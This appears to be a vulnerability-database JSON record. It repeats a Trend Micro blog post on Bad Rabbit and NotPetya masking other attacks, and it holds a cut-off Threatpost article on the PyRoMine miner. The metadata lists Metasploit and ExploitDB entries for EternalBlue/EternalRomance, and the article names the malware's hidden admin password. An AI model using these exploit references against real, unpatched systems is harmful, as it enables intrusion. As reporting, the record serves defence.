Ukraine](<https://thehackernews.com/2017/10/bad-rabbit-ransomware.html>), The Hacker News reported. The Bad Rabbit exploit utilized an NSA exploit stolen by the Shadow Brokers hacking group, enabling it to quickly infiltrate and spread across victims' networks. \n\nOther well-known samples have recently leveraged EternalBlue - like the NotPetya ransomware, which we'll discuss a bit later. Bad Rabbit, on the other hand, used the EternalRomance RCE exploit to drive its malicious activity. This vulnerability works by exploiting a Microsoft Windows Server Messaging Block flaw identified as CVE-2017-0145. The vulnerability impacts the transfer of data between Windows endpoints, and enables hackers to bypass security protocols to support remove code execution. \n\nWhen the attacks first emerged, researchers found that the infection began with a drive-by download stemming from infected Russian media sites which utilized a fake Flasher player to install the malware. \n\nFrom the successful infections, though, researchers quickly discovered that Bad Rabbit wasn't just a run-of-the-mill ransomware infection: The sample also [hid a powerful spear phishing campaign](<https://blog.knowbe4.com/bad-rabbit-ransomware-attack-was-hiding-a-spear-phishing-campaign>). \n\n\"[A] number of Ukrainian entities were targeted by phishing campaigns at the same time as Bad Rabbit spread,\" KnowBe4 contributor Stu Sjouwerman wrote. \"Those campaigns intended to compromise financial information and other sensitive data.\" \n\nIn this way, the initial Bad Rabbit ransomware was just a smoke screen for a more targeted attack seeking out valuable company data. Serhiy Demedyuk, head of the Ukrainian state cyber police, called the instances \"hybrid attacks,\" and noted that the first attack garners much of the attention, enabling the second attack to succeed with \"devastating results.\" \n\nDon't be fooled: Bad Rabbit initially appeared to leverage a Windows vulnerability, but it actually masked a powerful spear phishing attack. \n\n## NotPetya aims to destroy\n\nNotPetya also serves as a powerful example of a double whammy style attack. However, whereas Bad Rabbit masked other, malicious spear phishing activity, NotPetya appeared as a ransomware sample that just aimed to destroy, and not steal from victims' systems. \n\nThe first time many heard about this attack was when its predecessor, Petya, emerged in March of 2016, according to CSO Online contributor Josh Fruhlinger. Petya leveraged an infected email to breach victims, and then moved on to encrypting individual files, including .exe files. \n\nThen, [in June 2017, NotPetya emerged](<https://www.csoonline.com/article/3233210/ransomware/petya-ransomware-and-notpetya-malware-what-you-need-to-know-now.html>), and initially appeared like a typical ransomware infection able to spread quickly from victim to victim and network to network. Although NotPetya looked very similar to Petya - including encrypting files and displaying a notification requesting Bitcoin in exchange for returned access - NotPetya quickly set itself apart. \n\nFruhlinger pointed out that while Petya used an infected email, much like many ransomware samples, NotPetya was able to spread all on its own, using several different approaches to spur infection including a forced backdoor that doesn't require human interaction for successful breach. NotPetya is also capable of encrypting more files, to the point that the hard drive is inoperable. \n\nFinally, as Fruhlinger noted, NotPetya isn't actually ransomware. Its process of infection and encryption is used to mask its true intentions: destruction. \n\n\"It looks like ransomware, complete with a screen informing the victim that they can decrypt their files if they send Bitcoin to a specified wallet,\" Fruhlinger explained. \"For Petya, this screen includes an identifying that they're supposed to send along with the ransom; the attackers use this code to figure out which victim just paid up. But on computers infected with NotPetya, this number is just randomly generated and would be of no help in identifying anything. And it turns out that in the process of encrypting the data, NotPetya damages it beyond repair.\" \n\n_\"NotPetya's process of infection and encryption is used to mask its true intentions: destruction. \"_\n\nSurprisingly, NotPetya's aim isn't to steal data and then sell this information for profit or use it for identity theft or other malicious purposes. NotPetya appears to simply want to break victims' systems, whether or not they pay the ransom. \n\n## Guarding against hybrid attacks \n\nAs hacking becomes more complex and sophisticated and attackers continually flex their skills, it's imperative that businesses are able to keep up with and protect against the latest styles of threats. These hybrid, or masked attacks demonstrate the importance of having as much visibility into network activity as possible, ensuring that even if suspicious activity is detected in one area, victims aren't distracted to the point that it allows for a secondary, damaging attack. \n\nPrecautions including end-to-end monitoring is ideal, helping to prevent malicious and suspicious commands from flying under the radar. IT leaders and decision-makers should seek out solutions that can help pinpoint activity associated with a targeted attack, and providing granular visibility across the network. [Trend Micro's Deep Discovery](<http://apac.trendmicro.com/apac/enterprise/security-risk-management/deep-discovery/index.html>) and [Connected Threat Defense](<https://www.trendmicro.com/en_us/business/technologies/connected-threat-defense.html>) can help ensure that your organization has all-encompassing security. \n\nTo find out more about how Deep Discovery and Connected Threat Defense can benefit your company's security posture, contact Trend Micro today.", "viewCount": 15}, "differentElements": ["description", "href"], "edition": 3}, {"lastseen": "2017-11-22T18:01:25", "bulletin": {"published": "2017-11-20T16:29:06", "href": "https://blog.trendmicro.com/double-whammy-when-one-attack-masks-another-attack/", "enchantments_done": [], "lastseen": "2017-11-22T18:01:25", "history": [], "type": "trendmicroblog", "bulletinFamily": "blog", "modified": "2017-11-20T16:29:06", "enchantments": {}, "id": "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "reporter": "Trend Micro", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "title": "Double Whammy: When One Attack Masks Another Attack", "objectVersion": "1.4", "cvelist": ["CVE-2017-0145"], "references": [], "description": "\n\nIn some contexts, a double whammy can mean a good thing: when your favorite team wins two games in a row, when two candy bars fall from the vending machine, etc. However, in the context of cyber security, a double whammy may translate to being attacked while still reeling from the impact of another threat.\n\nIn cyber security, many organizations focus on addressing individual weaknesses and exploitable vulnerabilities, thinking this will be enough to stop an attack. While this is sometimes true, today's hackers are much more sophisticated and determined than cyber criminals of the past. If one avenue into a target doesn't work, a hacker will keep trying until they're able to successfully breach the system. \n\nRecently, a new style of hacking has emerged, which leverages not one, but two separate malware-supported attacks. In this setup, one attack serves as a distraction, masking the malicious activities of the other malware as it flies under the radar - providing a path for additional infections, or to making off with stolen data and other intellectual property. Hackers will typically utilize particularly visible ransomware samples for the initial attack, providing an ideal distraction tool within this style of double whammy breach. This approach is something that will take place increasingly frequently into 2018. \n\nBut what, exactly, does this kind of attack look like? And how can organizations protect themselves when a double whammy cyber security instance of this kind hits their systems? Let's take a closer look at what happens when one attack masks another: \n\n## Bad Rabbit hides spear phishing \n\nA recent example of one attack masking another more damaging hacker activity involves Bad Rabbit. This ransomware sample first emerged in the fall of 2017 when it was used as the launch pad for the [infection of more than 200 organizations in Russia and Ukraine](<https://thehackernews.com/2017/10/bad-rabbit-ransomware.html>), The Hacker News reported. The Bad Rabbit exploit utilized an NSA exploit stolen by the Shadow Brokers hacking group, enabling it to quickly infiltrate and spread across victims' networks. \n\nOther well-known samples have recently leveraged EternalBlue - like the NotPetya ransomware, which we'll discuss a bit later. Bad Rabbit, on the other hand, used the EternalRomance RCE exploit to drive its malicious activity. This vulnerability works by exploiting a Microsoft Windows Server Messaging Block flaw identified as CVE-2017-0145. The vulnerability impacts the transfer of data between Windows endpoints, and enables hackers to bypass security protocols to support remove code execution. \n\nWhen the attacks first emerged, researchers found that the infection began with a drive-by download stemming from infected Russian media sites which utilized a fake Flasher player to install the malware. \n\nFrom the successful infections, though, researchers quickly discovered that Bad Rabbit wasn't just a run-of-the-mill ransomware infection: The sample also [hid a powerful spear phishing campaign](<https://blog.knowbe4.com/bad-rabbit-ransomware-attack-was-hiding-a-spear-phishing-campaign>). \n\n\"[A] number of Ukrainian entities were targeted by phishing campaigns at the same time as Bad Rabbit spread,\" KnowBe4 contributor Stu Sjouwerman wrote. \"Those campaigns intended to compromise financial information and other sensitive data.\" \n\nIn this way, the initial Bad Rabbit ransomware was just a smoke screen for a more targeted attack seeking out valuable company data. Serhiy Demedyuk, head of the Ukrainian state cyber police, called the instances \"hybrid attacks,\" and noted that the first attack garners much of the attention, enabling the second attack to succeed with \"devastating results.\" \n\nDon't be fooled: Bad Rabbit initially appeared to leverage a Windows vulnerability, but it actually masked a powerful spear phishing attack. \n\n## NotPetya aims to destroy\n\nNotPetya also serves as a powerful example of a double whammy style attack. However, whereas Bad Rabbit masked other, malicious spear phishing activity, NotPetya appeared as a ransomware sample that just aimed to destroy, and not steal from victims' systems. \n\nThe first time many heard about this attack was when its predecessor, Petya, emerged in March of 2016, according to CSO Online contributor Josh Fruhlinger. Petya leveraged an infected email to breach victims, and then moved on to encrypting individual files, including .exe files. \n\nThen, [in June 2017, NotPetya emerged](<https://www.csoonline.com/article/3233210/ransomware/petya-ransomware-and-notpetya-malware-what-you-need-to-know-now.html>), and initially appeared like a typical ransomware infection able to spread quickly from victim to victim and network to network. Although NotPetya looked very similar to Petya - including encrypting files and displaying a notification requesting Bitcoin in exchange for returned access - NotPetya quickly set itself apart. \n\nFruhlinger pointed out that while Petya used an infected email, much like many ransomware samples, NotPetya was able to spread all on its own, using several different approaches to spur infection including a forced backdoor that doesn't require human interaction for successful breach. NotPetya is also capable of encrypting more files, to the point that the hard drive is inoperable. \n\nFinally, as Fruhlinger noted, NotPetya isn't actually ransomware. Its process of infection and encryption is used to mask its true intentions: destruction. \n\n\"It looks like ransomware, complete with a screen informing the victim that they can decrypt their files if they send Bitcoin to a specified wallet,\" Fruhlinger explained. \"For Petya, this screen includes an identifying that they're supposed to send along with the ransom; the attackers use this code to figure out which victim just paid up. But on computers infected with NotPetya, this number is just randomly generated and would be of no help in identifying anything. And it turns out that in the process of encrypting the data, NotPetya damages it beyond repair.\" \n\n_\"NotPetya's process of infection and encryption is used to mask its true intentions: destruction. \"_\n\nSurprisingly, NotPetya's aim isn't to steal data and then sell this information for profit or use it for identity theft or other malicious purposes. NotPetya appears to simply want to break victims' systems, whether or not they pay the ransom. \n\n## Guarding against hybrid attacks \n\nAs hacking becomes more complex and sophisticated and attackers continually flex their skills, it's imperative that businesses are able to keep up with and protect against the latest styles of threats. These hybrid, or masked attacks demonstrate the importance of having as much visibility into network activity as possible, ensuring that even if suspicious activity is detected in one area, victims aren't distracted to the point that it allows for a secondary, damaging attack. \n\nPrecautions including end-to-end monitoring is ideal, helping to prevent malicious and suspicious commands from flying under the radar. IT leaders and decision-makers should seek out solutions that can help pinpoint activity associated with a targeted attack, and providing granular visibility across the network. [Trend Micro's Deep Discovery](<http://apac.trendmicro.com/apac/enterprise/security-risk-management/deep-discovery/index.html>) and [Connected Threat Defense](<https://www.trendmicro.com/en_us/business/technologies/connected-threat-defense.html>) can help ensure that your organization has all-encompassing security. \n\nTo find out more about how Deep Discovery and Connected Threat Defense can benefit your company's security posture, contact Trend Micro today.", "viewCount": 15}, "differentElements": ["description", "href"], "edition": 4}, {"lastseen": "2017-11-22T20:27:02", "bulletin": {"published": "2017-11-20T16:29:06", "href": "http://blog.trendmicro.com/double-whammy-when-one-attack-masks-another-attack/", "enchantments_done": [], "lastseen": "2017-11-22T20:27:02", "history": [], "type": "trendmicroblog", "bulletinFamily": "blog", "modified": "2017-11-20T16:29:06", "enchantments": {}, "id": "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "reporter": "Trend Micro", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "title": "Double Whammy: When One Attack Masks Another Attack", "objectVersion": "1.4", "cvelist": ["CVE-2017-0145"], "references": [], "description": "\n\nIn some contexts, a double whammy can mean a good thing: when your favorite team wins two games in a row, when two candy bars fall from the vending machine, etc. However, in the context of cyber security, a double whammy may translate to being attacked while still reeling from the impact of another threat.\n\nIn cyber security, many organizations focus on addressing individual weaknesses and exploitable vulnerabilities, thinking this will be enough to stop an attack. While this is sometimes true, today's hackers are much more sophisticated and determined than cyber criminals of the past. If one avenue into a target doesn't work, a hacker will keep trying until they're able to successfully breach the system. \n\nRecently, a new style of hacking has emerged, which leverages not one, but two separate malware-supported attacks. In this setup, one attack serves as a distraction, masking the malicious activities of the other malware as it flies under the radar - providing a path for additional infections, or to making off with stolen data and other intellectual property. Hackers will typically utilize particularly visible ransomware samples for the initial attack, providing an ideal distraction tool within this style of double whammy breach. This approach is something that will take place increasingly frequently into 2018. \n\nBut what, exactly, does this kind of attack look like? And how can organizations protect themselves when a double whammy cyber security instance of this kind hits their systems? Let's take a closer look at what happens when one attack masks another: \n\n## Bad Rabbit hides spear phishing \n\nA recent example of one attack masking another more damaging hacker activity involves Bad Rabbit. This ransomware sample first emerged in the fall of 2017 when it was used as the launch pad for the [infection of more than 200 organizations in Russia and Ukraine](<https://thehackernews.com/2017/10/bad-rabbit-ransomware.html>), The Hacker News reported. The Bad Rabbit exploit utilized an NSA exploit stolen by the Shadow Brokers hacking group, enabling it to quickly infiltrate and spread across victims' networks. \n\nOther well-known samples have recently leveraged EternalBlue - like the NotPetya ransomware, which we'll discuss a bit later. Bad Rabbit, on the other hand, used the EternalRomance RCE exploit to drive its malicious activity. This vulnerability works by exploiting a Microsoft Windows Server Messaging Block flaw identified as CVE-2017-0145. The vulnerability impacts the transfer of data between Windows endpoints, and enables hackers to bypass security protocols to support remove code execution. \n\nWhen the attacks first emerged, researchers found that the infection began with a drive-by download stemming from infected Russian media sites which utilized a fake Flasher player to install the malware. \n\nFrom the successful infections, though, researchers quickly discovered that Bad Rabbit wasn't just a run-of-the-mill ransomware infection: The sample also [hid a powerful spear phishing campaign](<https://blog.knowbe4.com/bad-rabbit-ransomware-attack-was-hiding-a-spear-phishing-campaign>). \n\n\"[A] number of Ukrainian entities were targeted by phishing campaigns at the same time as Bad Rabbit spread,\" KnowBe4 contributor Stu Sjouwerman wrote. \"Those campaigns intended to compromise financial information and other sensitive data.\" \n\nIn this way, the initial Bad Rabbit ransomware was just a smoke screen for a more targeted attack seeking out valuable company data. Serhiy Demedyuk, head of the Ukrainian state cyber police, called the instances \"hybrid attacks,\" and noted that the first attack garners much of the attention, enabling the second attack to succeed with \"devastating results.\" \n\nDon't be fooled: Bad Rabbit initially appeared to leverage a Windows vulnerability, but it actually masked a powerful spear phishing attack. \n\n## NotPetya aims to destroy\n\nNotPetya also serves as a powerful example of a double whammy style attack. However, whereas Bad Rabbit masked other, malicious spear phishing activity, NotPetya appeared as a ransomware sample that just aimed to destroy, and not steal from victims' systems. \n\nThe first time many heard about this attack was when its predecessor, Petya, emerged in March of 2016, according to CSO Online contributor Josh Fruhlinger. Petya leveraged an infected email to breach victims, and then moved on to encrypting individual files, including .exe files. \n\nThen, [in June 2017, NotPetya emerged](<https://www.csoonline.com/article/3233210/ransomware/petya-ransomware-and-notpetya-malware-what-you-need-to-know-now.html>), and initially appeared like a typical ransomware infection able to spread quickly from victim to victim and network to network. Although NotPetya looked very similar to Petya - including encrypting files and displaying a notification requesting Bitcoin in exchange for returned access - NotPetya quickly set itself apart. \n\nFruhlinger pointed out that while Petya used an infected email, much like many ransomware samples, NotPetya was able to spread all on its own, using several different approaches to spur infection including a forced backdoor that doesn't require human interaction for successful breach. NotPetya is also capable of encrypting more files, to the point that the hard drive is inoperable. \n\nFinally, as Fruhlinger noted, NotPetya isn't actually ransomware. Its process of infection and encryption is used to mask its true intentions: destruction. \n\n\"It looks like ransomware, complete with a screen informing the victim that they can decrypt their files if they send Bitcoin to a specified wallet,\" Fruhlinger explained. \"For Petya, this screen includes an identifying that they're supposed to send along with the ransom; the attackers use this code to figure out which victim just paid up. But on computers infected with NotPetya, this number is just randomly generated and would be of no help in identifying anything. And it turns out that in the process of encrypting the data, NotPetya damages it beyond repair.\" \n\n_\"NotPetya's process of infection and encryption is used to mask its true intentions: destruction. \"_\n\nSurprisingly, NotPetya's aim isn't to steal data and then sell this information for profit or use it for identity theft or other malicious purposes. NotPetya appears to simply want to break victims' systems, whether or not they pay the ransom. \n\n## Guarding against hybrid attacks \n\nAs hacking becomes more complex and sophisticated and attackers continually flex their skills, it's imperative that businesses are able to keep up with and protect against the latest styles of threats. These hybrid, or masked attacks demonstrate the importance of having as much visibility into network activity as possible, ensuring that even if suspicious activity is detected in one area, victims aren't distracted to the point that it allows for a secondary, damaging attack. \n\nPrecautions including end-to-end monitoring is ideal, helping to prevent malicious and suspicious commands from flying under the radar. IT leaders and decision-makers should seek out solutions that can help pinpoint activity associated with a targeted attack, and providing granular visibility across the network. [Trend Micro's Deep Discovery](<http://apac.trendmicro.com/apac/enterprise/security-risk-management/deep-discovery/index.html>) and [Connected Threat Defense](<https://www.trendmicro.com/en_us/business/technologies/connected-threat-defense.html>) can help ensure that your organization has all-encompassing security. \n\nTo find out more about how Deep Discovery and Connected Threat Defense can benefit your company's security posture, contact Trend Micro today.", "viewCount": 16}, "differentElements": ["description", "href"], "edition": 5}], "_object_type": "robots.models.rss.RssBulletin", "type": "trendmicroblog", "bulletinFamily": "blog", "modified": "2017-11-20T16:29:06", "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2017-11-26T20:03:00", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2017-11-26T20:03:00", "rev": 2}}, "id": "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "reporter": "Trend Micro", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "title": "Double Whammy: When One Attack Masks Another Attack", "enchantments_done": [], "cvelist": ["CVE-2017-0145"], "references": [], "description": "\n\nIn some contexts, a double whammy can mean a good thing: when your favorite team wins two games in a row, when two candy bars fall from the vending machine, etc. However, in the context of cyber security, a double whammy may translate to being attacked while still reeling from the impact of another threat.\n\nIn cyber security, many organizations focus on addressing individual weaknesses and exploitable vulnerabilities, thinking this will be enough to stop an attack. While this is sometimes true, today's hackers are much more sophisticated and determined than cyber criminals of the past. If one avenue into a target doesn't work, a hacker will keep trying until they're able to successfully breach the system. \n\nRecently, a new style of hacking has emerged, which leverages not one, but two separate malware-supported attacks. In this setup, one attack serves as a distraction, masking the malicious activities of the other malware as it flies under the radar - providing a path for additional infections, or to making off with stolen data and other intellectual property. Hackers will typically utilize particularly visible ransomware samples for the initial attack, providing an ideal distraction tool within this style of double whammy breach. This approach is something that will take place increasingly frequently into 2018. \n\nBut what, exactly, does this kind of attack look like? And how can organizations protect themselves when a double whammy cyber security instance of this kind hits their systems? Let's take a closer look at what happens when one attack masks another: \n\n## Bad Rabbit hides spear phishing \n\nA recent example of one attack masking another more damaging hacker activity involves Bad Rabbit. This ransomware sample first emerged in the fall of 2017 when it was used as the launch pad for the [infection of more than 200 organizations in Russia and Ukraine](<https://thehackernews.com/2017/10/bad-rabbit-ransomware.html>), The Hacker News reported. The Bad Rabbit exploit utilized an NSA exploit stolen by the Shadow Brokers hacking group, enabling it to quickly infiltrate and spread across victims' networks. \n\nOther well-known samples have recently leveraged EternalBlue - like the NotPetya ransomware, which we'll discuss a bit later. Bad Rabbit, on the other hand, used the EternalRomance RCE exploit to drive its malicious activity. This vulnerability works by exploiting a Microsoft Windows Server Messaging Block flaw identified as CVE-2017-0145. The vulnerability impacts the transfer of data between Windows endpoints, and enables hackers to bypass security protocols to support remove code execution. \n\nWhen the attacks first emerged, researchers found that the infection began with a drive-by download stemming from infected Russian media sites which utilized a fake Flasher player to install the malware. \n\nFrom the successful infections, though, researchers quickly discovered that Bad Rabbit wasn't just a run-of-the-mill ransomware infection: The sample also [hid a powerful spear phishing campaign](<https://blog.knowbe4.com/bad-rabbit-ransomware-attack-was-hiding-a-spear-phishing-campaign>). \n\n\"[A] number of Ukrainian entities were targeted by phishing campaigns at the same time as Bad Rabbit spread,\" KnowBe4 contributor Stu Sjouwerman wrote. \"Those campaigns intended to compromise financial information and other sensitive data.\" \n\nIn this way, the initial Bad Rabbit ransomware was just a smoke screen for a more targeted attack seeking out valuable company data. Serhiy Demedyuk, head of the Ukrainian state cyber police, called the instances \"hybrid attacks,\" and noted that the first attack garners much of the attention, enabling the second attack to succeed with \"devastating results.\" \n\nDon't be fooled: Bad Rabbit initially appeared to leverage a Windows vulnerability, but it actually masked a powerful spear phishing attack. \n\n## NotPetya aims to destroy\n\nNotPetya also serves as a powerful example of a double whammy style attack. However, whereas Bad Rabbit masked other, malicious spear phishing activity, NotPetya appeared as a ransomware sample that just aimed to destroy, and not steal from victims' systems. \n\nThe first time many heard about this attack was when its predecessor, Petya, emerged in March of 2016, according to CSO Online contributor Josh Fruhlinger. Petya leveraged an infected email to breach victims, and then moved on to encrypting individual files, including .exe files. \n\nThen, [in June 2017, NotPetya emerged](<https://www.csoonline.com/article/3233210/ransomware/petya-ransomware-and-notpetya-malware-what-you-need-to-know-now.html>), and initially appeared like a typical ransomware infection able to spread quickly from victim to victim and network to network. Although NotPetya looked very similar to Petya - including encrypting files and displaying a notification requesting Bitcoin in exchange for returned access - NotPetya quickly set itself apart. \n\nFruhlinger pointed out that while Petya used an infected email, much like many ransomware samples, NotPetya was able to spread all on its own, using several different approaches to spur infection including a forced backdoor that doesn't require human interaction for successful breach. NotPetya is also capable of encrypting more files, to the point that the hard drive is inoperable. \n\nFinally, as Fruhlinger noted, NotPetya isn't actually ransomware. Its process of infection and encryption is used to mask its true intentions: destruction. \n\n\"It looks like ransomware, complete with a screen informing the victim that they can decrypt their files if they send Bitcoin to a specified wallet,\" Fruhlinger explained. \"For Petya, this screen includes an identifying that they're supposed to send along with the ransom; the attackers use this code to figure out which victim just paid up. But on computers infected with NotPetya, this number is just randomly generated and would be of no help in identifying anything. And it turns out that in the process of encrypting the data, NotPetya damages it beyond repair.\" \n\n_\"NotPetya's process of infection and encryption is used to mask its true intentions: destruction. \"_\n\nSurprisingly, NotPetya's aim isn't to steal data and then sell this information for profit or use it for identity theft or other malicious purposes. NotPetya appears to simply want to break victims' systems, whether or not they pay the ransom. \n\n## Guarding against hybrid attacks \n\nAs hacking becomes more complex and sophisticated and attackers continually flex their skills, it's imperative that businesses are able to keep up with and protect against the latest styles of threats. These hybrid, or masked attacks demonstrate the importance of having as much visibility into network activity as possible, ensuring that even if suspicious activity is detected in one area, victims aren't distracted to the point that it allows for a secondary, damaging attack. \n\nPrecautions including end-to-end monitoring is ideal, helping to prevent malicious and suspicious commands from flying under the radar. IT leaders and decision-makers should seek out solutions that can help pinpoint activity associated with a targeted attack, and providing granular visibility across the network. [Trend Micro's Deep Discovery](<http://apac.trendmicro.com/apac/enterprise/security-risk-management/deep-discovery/index.html>) and [Connected Threat Defense](<https://www.trendmicro.com/en_us/business/technologies/connected-threat-defense.html>) can help ensure that your organization has all-encompassing security. \n\nTo find out more about how Deep Discovery and Connected Threat Defense can benefit your company's security posture, contact Trend Micro today.", "viewCount": 190, "immutableFields": [], "cvss2": {}, "cvss3": {}}], "threatpost": [{"id": "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "hash": "398fac8eba652e6430142737bf248696", "type": "threatpost", "bulletinFamily": "info", "title": "PyRoMine Uses NSA Exploit for Monero Mining and Backdoors", "description": "The ShadowBrokers\u2019 release of a trove of National Security Agency exploits last year appears to be the gift that keeps on giving, to the hacker community at least: A fresh malware that uses the EternalRomance tool has hit the scene, with Monero-mining as the stated goal. However, more damaging follow-on attacks are likely the endgame.\n\nThe bad code is a Python-based cryptocurrency mining malware, according to Fortinet\u2019s FortiGuard Labs, which first [discovered it](<https://www.fortinet.com/blog/threat-research/python-based-malware-uses-nsa-exploit-to-propagate-monero--xmr--.html>) this month. Because the malware uses the EternalRomance exploit, the researchers have given it the snappy name of \u201cPyRoMine.\u201d\n\nThe malware can be downloaded as an executable file compiled with PyInstaller, which is a program that packages code written in Python into stand-alone executables. This means that, conveniently, there is no need to install Python on the machine in order to execute the Python-based PyRoMine. Once installed, it sets about silently stealing CPU resources from unwitting victims to aim its proverbial drill bit at uncovering Monero profits.\n\n\u201cWe don\u2019t know for sure how it arrives on a system, but considering that this is the type of malware that needs to be mass distributed, it is safe to assume that it arrives via spam email or drive-by-download,\u201d FortiGuard security researcher Jasper Manuel said in an email interview.\n\nWorryingly, PyRoMine also sets up a hidden default account on the victimized machine with system administrator privileges, using the password \u201cP@ssw0rdf0rme.\u201d It\u2019s likely that this would be used for re-infection and further attacks, according to Manuel.\n\n\u201cIt is fairly likely that future attacks could happen,\u201d he told Threatpost. \u201cAlthough this malware is not a botnet because it doesn\u2019t phone home to report an infection and doesn\u2019t wait for commands, it still sets up an account on the affected machine and enables Remote Desktop Protocol. The attackers could use the same channel to connect to the machine using the created account to do further attacks.\u201d\n\n**Ripe for Spreading**\n\nBased on the earnings that PyRoMine has so to date (only about $650), it hasn\u2019t exactly lived up to its name and caught fire on the propagation front. But that could rapidly change: For one, the choice of Monero indicates that the criminals are looking to cast a wide net, given that the currency offers an important \u201cfeature\u201d that make it more suitable to the mass market than the more venerable Bitcoin: It relies on a proof-of-work algorithm called CryptoNight, designed for ordinary computers and even mobile phones, rather than for high-end GPUs or the specialized hardware needed for efficient Bitcoin mining. Thus, the potential attack surface consists of consumers and businesses alike, globally.\n\nSecondly, cybercriminals have discovered that enterprises and individuals have been pretty slow when it comes to patching the known vulnerabilities that the NSA tools leverage.\n\nThe ShadowBrokers [leaked a whole treasure chest](<https://threatpost.com/shadowbrokers-put-price-on-monthly-zero-day-leaks/125960/>) of hacking tools and zero-day exploits in 2017, attributed to the Equation Group, which is believed to be an arm of the NSA\u2019s Tailored Access Operations unit. They target Windows XP/Vista/8.1/7/10 and Windows Server 2003/2008/2012/2016, taking advantage of a pair of vulnerabilities, CVE-2017-0144 and CVE-2017-0145. Microsoft [patched these very quickly](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>) after the tools were made public.\n\n\u201cThe patch for EternalRomance was released a year ago, but many still don\u2019t think proactive about security,\u201d Manuel told Threatpost. \u201cThe fact that cybercriminals use these exploits tells us that they still profit by using these exploits in their malware.\u201d\n\nAnd finally, EternalRomance is a remote code execution (RCE) exploit that abuses the legacy SMBv1 file-sharing protocol. SMBv1 is typically used only within the local area network of a business, but all too often it\u2019s left exposed to the internet \u2013one of the contributing factors as to why the EternalX attacks WannaCry and NotPetya [were able to spread so widely](<https://threatpost.com/complex-petya-like-ransomware-outbreak-worse-than-wannacry/126561/>).\n\n\u201cIn the past, we have seen that these exploits were used by state-sponsored threat actors,\u201d Manuel told us. \u201cWithin days of the release, we started seeing these exploits being used by commodity malware like cryptominers and info-stealers to target general victims.\u201d\n\nPyRoMine isn\u2019t the first miner to use the NSA tools: Researchers have discovered malware authors using the EternalBlue exploit in other cryptocurrency mining malware, such as [Adylkuzz](<https://threatpost.com/cryptocurrency-mining-malware-hosted-in-amazon-s3-bucket/127643/>), 